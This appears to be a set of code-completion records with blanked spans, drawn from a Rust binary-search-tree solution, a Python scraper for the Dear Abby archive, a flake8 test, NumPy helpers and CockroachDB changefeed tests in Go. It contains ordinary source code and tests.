let mut result = Some(Rc::new(RefCell::new(TreeNode::new(nums[mid]))));
result.as_mut().unwrap().borrow_mut().left =
Self::sorted_array_to_bst(nums[..mid].to_vec());
result.as_mut().unwrap().borrow_mut().right =
Self::sorted_array_to_bst(nums[mid + 1..].to_vec());
result
}
}
// submission codes end
#[cfg(test)]
mod tests {
use super::*;
#[test]
#[ignore]
fn test_0108_example_1() {
let nums = vec![-10, -3, 0, 5, 9];
let result = tree![0, -3, 9, -10, null, 5];
assert_eq!(Solution::sorted_array_to_bst(nums), result);
}
#[test]
#[ignore]
fn test_0108_example_2() {
let nums = vec![1, 3];
let result = tree![3, 1];
assert_eq!(Solution::sorted_array_to_bst(nums), result);
}
}
| Solution |
textScrape.py | #!/Users/mcmenamin/.virtualenvs/py3env/bin/python
from lxml import html
import requests
from datetime import date
import numpy as np
import pandas as pd
import re
from itertools import chain
import pickle
from tqdm import tqdm
def getURLforYear(year, archiveURL='http://www.uexpress.com/dearabby/archives'):
archive = requests.get('{0}/{1}'.format(archiveURL, year))
tree = html.fromstring(archive.text)
urlList = [a.attrib['href'] for a in tree.find_class('media-link-main')]
return urlList
def | (extURL, baseURL='http://www.uexpress.com/'):
page = requests.get('{0}{1}'.format(baseURL, extURL))
tree = html.fromstring(page.text)
questions = tree.find_class('item-section')
allQ = []
for q in questions:
qText = [i.text_content() for i in q.iterfind('p')]
allQ += qText
allQ = ' '.join(allQ)
return allQ
def parseAbby(block):
block = block.strip().split('DEAR ')
abbyBlock = [p.startswith('ABBY:') for p in block]
dearReaderBlock = [p.startswith('READERS:') for p in block]
replyBlock = [not (p[0] or p[1]) for p in zip(abbyBlock, dearReaderBlock)]
QA_pairs = []
if True in abbyBlock and True in replyBlock:
firstBlock = abbyBlock.index(True)
block = block[firstBlock:]
abbyBlock = abbyBlock[firstBlock:]
dearReaderBlock = dearReaderBlock[firstBlock:]
replyBlock = replyBlock[firstBlock:]
for i in range(len(block)-1):
if abbyBlock[i] and replyBlock[i+1]:
QA_pairs.append([block[i], block[i+1]])
return QA_pairs
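# Illustrative example (hypothetical input):
# parseAbby("DEAR ABBY: My dog barks all night. DEAR WRITER: Try earplugs.")
# returns one [question, reply] pair, because the second block starts with
# neither 'ABBY:' nor 'READERS:' and therefore counts as a reply.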
#
# Build the list of archive URLs for a specific date range
#
archivedURLs = list(chain.from_iterable([getURLforYear(y) for y in range(1991,2017+1)]))
#
# Pull in the text from each archived URL
#
all_text_dict = {}
for url in tqdm(archivedURLs):
raw_text = scrape_page(url)
all_text_dict[url] = {'path': url,
'date': date(*[int(i) for i in url.split('/')[2:5]]),
'raw_text': raw_text,
'parse_text': parseAbby(raw_text)
}
df_text = pd.DataFrame.from_dict(all_text_dict, orient='index')
df_text.to_pickle('abbyText.pickle')
df_text.to_json('abbyText.json',
lines=True,
orient='records',
force_ascii=True
)
| scrape_page |
test_flake8.py | # Copyright 2016-2018 Dirk Thomas
# Licensed under the Apache License, Version 2.0
import logging
from pathlib import Path
import sys
from flake8 import LOG
from flake8.api.legacy import get_style_guide
# avoid debug and info messages from flake8 internals
LOG.setLevel(logging.WARN)
def test_flake8():
| style_guide = get_style_guide(
ignore=['D100', 'D104'],
show_source=True,
)
style_guide_tests = get_style_guide(
ignore=['D100', 'D101', 'D102', 'D103', 'D104', 'D105', 'D107'],
show_source=True,
)
stdout = sys.stdout
sys.stdout = sys.stderr
# implicitly calls report_errors()
report = style_guide.check_files([
str(Path(__file__).parents[1] / 'colcon_powershell'),
])
report_tests = style_guide_tests.check_files([
str(Path(__file__).parents[1] / 'test'),
])
sys.stdout = stdout
total_errors = report.total_errors + report_tests.total_errors
if total_errors: # pragma: no cover
# output summary with per-category counts
print()
report._application.formatter.show_statistics(report._stats)
print(
'flake8 reported {total_errors} errors'
.format_map(locals()), file=sys.stderr)
assert not report.total_errors, \
'flake8 reported {total_errors} errors'.format_map(locals()) |
|
np_utils.py | from __future__ import absolute_import
import numpy as np
import scipy as sp
from six.moves import range
from six.moves import zip
def to_categorical(y, nb_classes=None):
'''Convert class vector (integers from 0 to nb_classes - 1)
to binary class matrix, for use with categorical_crossentropy.
'''
if not nb_classes:
nb_classes = np.max(y)+1
Y = np.zeros((len(y), nb_classes))
for i in range(len(y)):
Y[i, y[i]] = 1.
return Y
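# Example: to_categorical([0, 2, 1], nb_classes=3) returns
# [[1., 0., 0.],
#  [0., 0., 1.],
#  [0., 1., 0.]]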
def normalize(a, axis=-1, order=2):
l2 = np.atleast_1d(np.linalg.norm(a, order, axis))
l2[l2 == 0] = 1
return a / np.expand_dims(l2, axis)
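# Example: normalize(np.array([[3., 4.]])) returns [[0.6, 0.8]] (unit L2 norm).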
def binary_logloss(p, y):
epsilon = 1e-15
p = sp.maximum(epsilon, p)
p = sp.minimum(1-epsilon, p)
res = sum(y * sp.log(p) + sp.subtract(1, y) * sp.log(sp.subtract(1, p)))
res *= -1.0/len(y)
return res
def multiclass_logloss(P, Y):
npreds = [P[i][Y[i]-1] for i in range(len(Y))]
score = -(1. / len(Y)) * np.sum(np.log(npreds))
return score
def accuracy(p, y):
return np.mean([a == b for a, b in zip(p, y)])
def probas_to_classes(y_pred):
if len(y_pred.shape) > 1 and y_pred.shape[1] > 1:
return categorical_probas_to_classes(y_pred)
return np.array([1 if p > 0.5 else 0 for p in y_pred])
def categorical_probas_to_classes(p):
return np.argmax(p, axis=1)
def convert_kernel(kernel, dim_ordering='th'):
'''Converts a kernel matrix (numpy array)
from Theano format to TensorFlow format
(or reciprocally, since the transformation
is its own inverse).
'''
new_kernel = np.copy(kernel)
if dim_ordering == 'th':
w = kernel.shape[2]
h = kernel.shape[3]
for i in range(w):
for j in range(h):
new_kernel[:, :, i, j] = kernel[:, :, w - i - 1, h - j - 1]
elif dim_ordering == 'tf':
w = kernel.shape[0]
h = kernel.shape[1]
for i in range(w):
for j in range(h):
new_kernel[i, j, :, :] = kernel[w - i - 1, h - j - 1, :, :]
else:
raise Exception('Invalid dim_ordering: ' + str(dim_ordering)) | return new_kernel |
|
changefeed_test.go | // Copyright 2018 The Cockroach Authors.
//
// Licensed as a CockroachDB Enterprise file under the Cockroach Community
// License (the "License"); you may not use this file except in compliance with
// the License. You may obtain a copy of the License at
//
// https://github.com/cockroachdb/cockroach/blob/master/licenses/CCL.txt
package changefeedccl
import (
"context"
gosql "database/sql"
"fmt"
"math"
"net/url"
"regexp"
"sort"
"strconv"
"strings"
"sync"
"sync/atomic"
"testing"
"time"
"github.com/cockroachdb/cockroach-go/crdb"
"github.com/cockroachdb/cockroach/pkg/base"
"github.com/cockroachdb/cockroach/pkg/ccl/changefeedccl/cdctest"
"github.com/cockroachdb/cockroach/pkg/ccl/changefeedccl/changefeedbase"
"github.com/cockroachdb/cockroach/pkg/ccl/utilccl"
"github.com/cockroachdb/cockroach/pkg/jobs"
"github.com/cockroachdb/cockroach/pkg/jobs/jobspb"
"github.com/cockroachdb/cockroach/pkg/keys"
"github.com/cockroachdb/cockroach/pkg/kv"
"github.com/cockroachdb/cockroach/pkg/roachpb"
"github.com/cockroachdb/cockroach/pkg/security"
"github.com/cockroachdb/cockroach/pkg/server"
"github.com/cockroachdb/cockroach/pkg/server/telemetry"
"github.com/cockroachdb/cockroach/pkg/sql/execinfra"
"github.com/cockroachdb/cockroach/pkg/sql/sqlbase"
"github.com/cockroachdb/cockroach/pkg/storage"
"github.com/cockroachdb/cockroach/pkg/testutils"
"github.com/cockroachdb/cockroach/pkg/testutils/serverutils"
"github.com/cockroachdb/cockroach/pkg/testutils/sqlutils"
"github.com/cockroachdb/cockroach/pkg/util"
"github.com/cockroachdb/cockroach/pkg/util/encoding"
"github.com/cockroachdb/cockroach/pkg/util/hlc"
"github.com/cockroachdb/cockroach/pkg/util/leaktest"
"github.com/cockroachdb/cockroach/pkg/util/log"
"github.com/cockroachdb/cockroach/pkg/util/protoutil"
"github.com/cockroachdb/cockroach/pkg/util/retry"
"github.com/cockroachdb/cockroach/pkg/util/timeutil"
"github.com/pkg/errors"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func TestChangefeedBasics(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0, 'initial')`)
sqlDB.Exec(t, `UPSERT INTO foo VALUES (0, 'updated')`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo`)
defer closeFeed(t, foo)
// 'initial' is skipped because only the latest value ('updated') is
// emitted by the initial scan.
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0, "b": "updated"}}`,
})
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'a'), (2, 'b')`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1, "b": "a"}}`,
`foo: [2]->{"after": {"a": 2, "b": "b"}}`,
})
sqlDB.Exec(t, `UPSERT INTO foo VALUES (2, 'c'), (3, 'd')`)
assertPayloads(t, foo, []string{
`foo: [2]->{"after": {"a": 2, "b": "c"}}`,
`foo: [3]->{"after": {"a": 3, "b": "d"}}`,
})
sqlDB.Exec(t, `DELETE FROM foo WHERE a = 1`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": null}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
t.Run(`cloudstorage`, cloudStorageTest(testFn))
// NB running TestChangefeedBasics, which includes a DELETE, with
// cloudStorageTest is a regression test for #36994.
}
func TestChangefeedDiff(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0, 'initial')`)
sqlDB.Exec(t, `UPSERT INTO foo VALUES (0, 'updated')`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH diff`)
defer closeFeed(t, foo)
// 'initial' is skipped because only the latest value ('updated') is
// emitted by the initial scan.
assertPayloads(t, foo, []string{
`foo: [0]->{"after": {"a": 0, "b": "updated"}, "before": null}`,
})
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'a'), (2, 'b')`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1, "b": "a"}, "before": null}`,
`foo: [2]->{"after": {"a": 2, "b": "b"}, "before": null}`,
})
sqlDB.Exec(t, `UPSERT INTO foo VALUES (2, 'c'), (3, 'd')`)
assertPayloads(t, foo, []string{
`foo: [2]->{"after": {"a": 2, "b": "c"}, "before": {"a": 2, "b": "b"}}`,
`foo: [3]->{"after": {"a": 3, "b": "d"}, "before": null}`,
})
sqlDB.Exec(t, `DELETE FROM foo WHERE a = 1`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": null, "before": {"a": 1, "b": "a"}}`,
})
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'new a')`)
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1, "b": "new a"}, "before": null}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
t.Run(`cloudstorage`, cloudStorageTest(testFn))
}
func TestChangefeedEnvelope(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'a')`)
t.Run(`envelope=row`, func(t *testing.T) {
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH envelope='row'`)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{`foo: [1]->{"a": 1, "b": "a"}`})
})
t.Run(`envelope=deprecated_row`, func(t *testing.T) {
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH envelope='deprecated_row'`)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{`foo: [1]->{"a": 1, "b": "a"}`})
})
t.Run(`envelope=key_only`, func(t *testing.T) {
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH envelope='key_only'`)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{`foo: [1]->`})
})
t.Run(`envelope=wrapped`, func(t *testing.T) {
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH envelope='wrapped'`)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{`foo: [1]->{"after": {"a": 1, "b": "a"}}`})
})
t.Run(`envelope=wrapped,key_in_value`, func(t *testing.T) {
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH key_in_value, envelope='wrapped'`)
defer closeFeed(t, foo)
assertPayloads(t, foo, []string{`foo: [1]->{"after": {"a": 1, "b": "a"}, "key": [1]}`})
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedMultiTable(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'a')`)
sqlDB.Exec(t, `CREATE TABLE bar (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO bar VALUES (2, 'b')`)
fooAndBar := feed(t, f, `CREATE CHANGEFEED FOR foo, bar`)
defer closeFeed(t, fooAndBar)
assertPayloads(t, fooAndBar, []string{
`foo: [1]->{"after": {"a": 1, "b": "a"}}`,
`bar: [2]->{"after": {"a": 2, "b": "b"}}`,
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedCursor(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY, b STRING)`)
// To make sure that these timestamps are after 'before' and before
// 'after', throw a couple sleeps around them. We round timestamps to
// Microsecond granularity for Postgres compatibility, so make the
// sleeps 10x that.
sqlDB.Exec(t, `INSERT INTO foo VALUES (1, 'before')`)
time.Sleep(10 * time.Microsecond)
var tsLogical string
sqlDB.QueryRow(t, `SELECT cluster_logical_timestamp()`).Scan(&tsLogical)
var tsClock time.Time
sqlDB.QueryRow(t, `SELECT clock_timestamp()`).Scan(&tsClock)
time.Sleep(10 * time.Microsecond)
sqlDB.Exec(t, `INSERT INTO foo VALUES (2, 'after')`)
fooLogical := feed(t, f, `CREATE CHANGEFEED FOR foo WITH cursor=$1`, tsLogical)
defer closeFeed(t, fooLogical)
assertPayloads(t, fooLogical, []string{
`foo: [2]->{"after": {"a": 2, "b": "after"}}`,
})
nanosStr := strconv.FormatInt(tsClock.UnixNano(), 10)
fooNanosStr := feed(t, f, `CREATE CHANGEFEED FOR foo WITH cursor=$1`, nanosStr)
defer closeFeed(t, fooNanosStr)
assertPayloads(t, fooNanosStr, []string{
`foo: [2]->{"after": {"a": 2, "b": "after"}}`,
})
timeStr := tsClock.Format(`2006-01-02 15:04:05.999999`)
fooString := feed(t, f, `CREATE CHANGEFEED FOR foo WITH cursor=$1`, timeStr)
defer closeFeed(t, fooString)
assertPayloads(t, fooString, []string{
`foo: [2]->{"after": {"a": 2, "b": "after"}}`,
})
// Check that the cursor is properly hooked up to the job statement
// time. The sinkless tests currently don't have a way to get the
// statement timestamp, so only verify this for enterprise.
if e, ok := fooLogical.(*cdctest.TableFeed); ok {
var bytes []byte
sqlDB.QueryRow(t, `SELECT payload FROM system.jobs WHERE id=$1`, e.JobID).Scan(&bytes)
var payload jobspb.Payload
require.NoError(t, protoutil.Unmarshal(bytes, &payload))
require.Equal(t, parseTimeToHLC(t, tsLogical), payload.GetChangefeed().StatementTime)
}
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func TestChangefeedTimestamps(t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
ctx := context.Background()
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO foo VALUES (0)`)
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH updated, resolved`)
defer closeFeed(t, foo)
// Grab the first non resolved-timestamp row.
var row0 *cdctest.TestFeedMessage
for {
var err error
row0, err = foo.Next()
assert.NoError(t, err)
if len(row0.Value) > 0 {
break
}
}
// If this changefeed uses jobs (and thus stores a ChangefeedDetails), get
// the statement timestamp from row0 and verify that they match. Otherwise,
// just skip the row.
if !strings.Contains(t.Name(), `sinkless`) {
d, err := foo.(*cdctest.TableFeed).Details()
assert.NoError(t, err)
expected := `{"after": {"a": 0}, "updated": "` + d.StatementTime.AsOfSystemTime() + `"}`
assert.Equal(t, expected, string(row0.Value))
}
// Assert the remaining key using assertPayloads, since we know the exact
// timestamp expected.
var ts1 string
if err := crdb.ExecuteTx(ctx, db, nil /* txopts */, func(tx *gosql.Tx) error {
return tx.QueryRow(
`INSERT INTO foo VALUES (1) RETURNING cluster_logical_timestamp()`,
).Scan(&ts1)
}); err != nil {
t.Fatal(err)
}
assertPayloads(t, foo, []string{
`foo: [1]->{"after": {"a": 1}, "updated": "` + ts1 + `"}`,
})
// Check that we eventually get a resolved timestamp greater than ts1.
parsed := parseTimeToHLC(t, ts1)
for {
if resolved := expectResolvedTimestamp(t, foo); parsed.Less(resolved) {
break
}
}
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
func | (t *testing.T) {
defer leaktest.AfterTest(t)()
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `CREATE TABLE foo (a INT PRIMARY KEY)`)
const freq = 10 * time.Millisecond
foo := feed(t, f, `CREATE CHANGEFEED FOR foo WITH resolved=$1`, freq.String())
defer closeFeed(t, foo)
// We get each resolved timestamp notification once in each partition.
// Grab the first `2 * #partitions`, sort because we might get all from
// one partition first, and compare the first and last.
resolved := make([]hlc.Timestamp, 2*len(foo.Partitions()))
for i := range resolved {
resolved[i] = expectResolvedTimestamp(t, foo)
}
sort.Slice(resolved, func(i, j int) bool { return resolved[i].Less(resolved[j]) })
first, last := resolved[0], resolved[len(resolved)-1]
if d := last.GoTime().Sub(first.GoTime()); d < freq {
t.Errorf(`expected %s between resolved timestamps, but got %s`, freq, d)
}
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
// Test how changefeeds behave with the no_initial_scan and initial_scan
// options, both without and with a cursor.
func TestChangefeedInitialScan(t *testing.T) {
defer leaktest.AfterTest(t)()
scope := log.Scope(t)
defer scope.Close(t)
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
sqlDB.Exec(t, `SET CLUSTER SETTING kv.closed_timestamp.target_duration = '10ms'`)
t.Run(`no cursor - no initial scan`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE no_initial_scan (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO no_initial_scan VALUES (1)`)
noInitialScan := feed(t, f, `CREATE CHANGEFEED FOR no_initial_scan `+
`WITH no_initial_scan, resolved='10ms'`)
defer closeFeed(t, noInitialScan)
expectResolvedTimestamp(t, noInitialScan)
sqlDB.Exec(t, `INSERT INTO no_initial_scan VALUES (2)`)
assertPayloads(t, noInitialScan, []string{
`no_initial_scan: [2]->{"after": {"a": 2}}`,
})
})
t.Run(`cursor - with initial scan`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE initial_scan (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO initial_scan VALUES (1), (2), (3)`)
var tsStr string
var i int
sqlDB.QueryRow(t, `SELECT count(*), cluster_logical_timestamp() from initial_scan`).Scan(&i, &tsStr)
initialScan := feed(t, f, `CREATE CHANGEFEED FOR initial_scan `+
`WITH initial_scan, resolved='10ms', cursor='`+tsStr+`'`)
defer closeFeed(t, initialScan)
assertPayloads(t, initialScan, []string{
`initial_scan: [1]->{"after": {"a": 1}}`,
`initial_scan: [2]->{"after": {"a": 2}}`,
`initial_scan: [3]->{"after": {"a": 3}}`,
})
sqlDB.Exec(t, `INSERT INTO initial_scan VALUES (4)`)
assertPayloads(t, initialScan, []string{
`initial_scan: [4]->{"after": {"a": 4}}`,
})
})
}
t.Run(`sinkless`, sinklessTest(testFn))
t.Run(`enterprise`, enterpriseTest(testFn))
}
// Test how Changefeeds react to schema changes that do not require a backfill
// operation.
func TestChangefeedSchemaChangeNoBackfill(t *testing.T) {
defer leaktest.AfterTest(t)()
scope := log.Scope(t)
defer scope.Close(t)
testFn := func(t *testing.T, db *gosql.DB, f cdctest.TestFeedFactory) {
sqlDB := sqlutils.MakeSQLRunner(db)
// Schema changes that predate the changefeed.
t.Run(`historical`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE historical (a INT PRIMARY KEY, b STRING DEFAULT 'before')`)
var start string
sqlDB.QueryRow(t, `SELECT cluster_logical_timestamp()`).Scan(&start)
sqlDB.Exec(t, `INSERT INTO historical (a, b) VALUES (0, '0')`)
sqlDB.Exec(t, `INSERT INTO historical (a) VALUES (1)`)
sqlDB.Exec(t, `ALTER TABLE historical ALTER COLUMN b SET DEFAULT 'after'`)
sqlDB.Exec(t, `INSERT INTO historical (a) VALUES (2)`)
sqlDB.Exec(t, `ALTER TABLE historical ADD COLUMN c INT`)
sqlDB.Exec(t, `INSERT INTO historical (a) VALUES (3)`)
sqlDB.Exec(t, `INSERT INTO historical (a, c) VALUES (4, 14)`)
historical := feed(t, f, `CREATE CHANGEFEED FOR historical WITH cursor=$1`, start)
defer closeFeed(t, historical)
assertPayloads(t, historical, []string{
`historical: [0]->{"after": {"a": 0, "b": "0"}}`,
`historical: [1]->{"after": {"a": 1, "b": "before"}}`,
`historical: [2]->{"after": {"a": 2, "b": "after"}}`,
`historical: [3]->{"after": {"a": 3, "b": "after", "c": null}}`,
`historical: [4]->{"after": {"a": 4, "b": "after", "c": 14}}`,
})
})
t.Run(`add column`, func(t *testing.T) {
// NB: the default is a nullable column
sqlDB.Exec(t, `CREATE TABLE add_column (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO add_column VALUES (1)`)
addColumn := feed(t, f, `CREATE CHANGEFEED FOR add_column`)
defer closeFeed(t, addColumn)
assertPayloads(t, addColumn, []string{
`add_column: [1]->{"after": {"a": 1}}`,
})
sqlDB.Exec(t, `ALTER TABLE add_column ADD COLUMN b STRING`)
sqlDB.Exec(t, `INSERT INTO add_column VALUES (2, '2')`)
assertPayloads(t, addColumn, []string{
`add_column: [2]->{"after": {"a": 2, "b": "2"}}`,
})
})
t.Run(`rename column`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE rename_column (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO rename_column VALUES (1, '1')`)
renameColumn := feed(t, f, `CREATE CHANGEFEED FOR rename_column`)
defer closeFeed(t, renameColumn)
assertPayloads(t, renameColumn, []string{
`rename_column: [1]->{"after": {"a": 1, "b": "1"}}`,
})
sqlDB.Exec(t, `ALTER TABLE rename_column RENAME COLUMN b TO c`)
sqlDB.Exec(t, `INSERT INTO rename_column VALUES (2, '2')`)
assertPayloads(t, renameColumn, []string{
`rename_column: [2]->{"after": {"a": 2, "c": "2"}}`,
})
})
t.Run(`add default`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_default (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO add_default (a, b) VALUES (1, '1')`)
addDefault := feed(t, f, `CREATE CHANGEFEED FOR add_default`)
defer closeFeed(t, addDefault)
sqlDB.Exec(t, `ALTER TABLE add_default ALTER COLUMN b SET DEFAULT 'd'`)
sqlDB.Exec(t, `INSERT INTO add_default (a) VALUES (2)`)
assertPayloads(t, addDefault, []string{
`add_default: [1]->{"after": {"a": 1, "b": "1"}}`,
`add_default: [2]->{"after": {"a": 2, "b": "d"}}`,
})
})
t.Run(`drop default`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE drop_default (a INT PRIMARY KEY, b STRING DEFAULT 'd')`)
sqlDB.Exec(t, `INSERT INTO drop_default (a) VALUES (1)`)
dropDefault := feed(t, f, `CREATE CHANGEFEED FOR drop_default`)
defer closeFeed(t, dropDefault)
sqlDB.Exec(t, `ALTER TABLE drop_default ALTER COLUMN b DROP DEFAULT`)
sqlDB.Exec(t, `INSERT INTO drop_default (a) VALUES (2)`)
assertPayloads(t, dropDefault, []string{
`drop_default: [1]->{"after": {"a": 1, "b": "d"}}`,
`drop_default: [2]->{"after": {"a": 2, "b": null}}`,
})
})
t.Run(`drop not null`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE drop_notnull (a INT PRIMARY KEY, b STRING NOT NULL)`)
sqlDB.Exec(t, `INSERT INTO drop_notnull VALUES (1, '1')`)
dropNotNull := feed(t, f, `CREATE CHANGEFEED FOR drop_notnull`)
defer closeFeed(t, dropNotNull)
sqlDB.Exec(t, `ALTER TABLE drop_notnull ALTER b DROP NOT NULL`)
sqlDB.Exec(t, `INSERT INTO drop_notnull VALUES (2, NULL)`)
assertPayloads(t, dropNotNull, []string{
`drop_notnull: [1]->{"after": {"a": 1, "b": "1"}}`,
`drop_notnull: [2]->{"after": {"a": 2, "b": null}}`,
})
})
t.Run(`checks`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE checks (a INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO checks VALUES (1)`)
checks := feed(t, f, `CREATE CHANGEFEED FOR checks`)
defer closeFeed(t, checks)
sqlDB.Exec(t, `ALTER TABLE checks ADD CONSTRAINT c CHECK (a < 5) NOT VALID`)
sqlDB.Exec(t, `INSERT INTO checks VALUES (2)`)
sqlDB.Exec(t, `ALTER TABLE checks VALIDATE CONSTRAINT c`)
sqlDB.Exec(t, `INSERT INTO checks VALUES (3)`)
sqlDB.Exec(t, `ALTER TABLE checks DROP CONSTRAINT c`)
sqlDB.Exec(t, `INSERT INTO checks VALUES (6)`)
assertPayloads(t, checks, []string{
`checks: [1]->{"after": {"a": 1}}`,
`checks: [2]->{"after": {"a": 2}}`,
`checks: [3]->{"after": {"a": 3}}`,
`checks: [6]->{"after": {"a": 6}}`,
})
})
t.Run(`add index`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE add_index (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (1, '1')`)
addIndex := feed(t, f, `CREATE CHANGEFEED FOR add_index`)
defer closeFeed(t, addIndex)
sqlDB.Exec(t, `CREATE INDEX b_idx ON add_index (b)`)
sqlDB.Exec(t, `SELECT * FROM add_index@b_idx`)
sqlDB.Exec(t, `INSERT INTO add_index VALUES (2, '2')`)
assertPayloads(t, addIndex, []string{
`add_index: [1]->{"after": {"a": 1, "b": "1"}}`,
`add_index: [2]->{"after": {"a": 2, "b": "2"}}`,
})
})
t.Run(`unique`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE "unique" (a INT PRIMARY KEY, b STRING)`)
sqlDB.Exec(t, `INSERT INTO "unique" VALUES (1, '1')`)
unique := feed(t, f, `CREATE CHANGEFEED FOR "unique"`)
defer closeFeed(t, unique)
sqlDB.Exec(t, `ALTER TABLE "unique" ADD CONSTRAINT u UNIQUE (b)`)
sqlDB.Exec(t, `INSERT INTO "unique" VALUES (2, '2')`)
assertPayloads(t, unique, []string{
`unique: [1]->{"after": {"a": 1, "b": "1"}}`,
`unique: [2]->{"after": {"a": 2, "b": "2"}}`,
})
})
t.Run(`alter default`, func(t *testing.T) {
sqlDB.Exec(
t, `CREATE TABLE alter_default (a INT PRIMARY KEY, b STRING DEFAULT 'before')`)
sqlDB.Exec(t, `INSERT INTO alter_default (a) VALUES (1)`)
alterDefault := feed(t, f, `CREATE CHANGEFEED FOR alter_default`)
defer closeFeed(t, alterDefault)
sqlDB.Exec(t, `ALTER TABLE alter_default ALTER COLUMN b SET DEFAULT 'after'`)
sqlDB.Exec(t, `INSERT INTO alter_default (a) VALUES (2)`)
assertPayloads(t, alterDefault, []string{
`alter_default: [1]->{"after": {"a": 1, "b": "before"}}`,
`alter_default: [2]->{"after": {"a": 2, "b": "after"}}`,
})
})
// Test adding a column with explicitly setting the default value to be NULL
t.Run(`add column with DEFAULT NULL`, func(t *testing.T) {
sqlDB.Exec(t, `CREATE TABLE t (id INT PRIMARY KEY)`)
sqlDB.Exec(t, `INSERT INTO t VALUES (1)`)
defaultNull := feed(t, f, `CREATE CHANGEFEED FOR t`)
defer closeFeed(t, defaultNull)
sqlDB.Exec(t, `ALTER TABLE t ADD COLUMN c INT DEFAULT NULL`)
sqlDB.Exec(t, `INSERT INTO t VALUES (2, 2)`)
assertPayloads(t, defaultNull, []string{
// Verify that no column backfill occurs
`t: [1]->{"after": {"id": 1}}`,
`t: [2]->{"after": {"c": 2, "id": 2}}`,
})
})
}
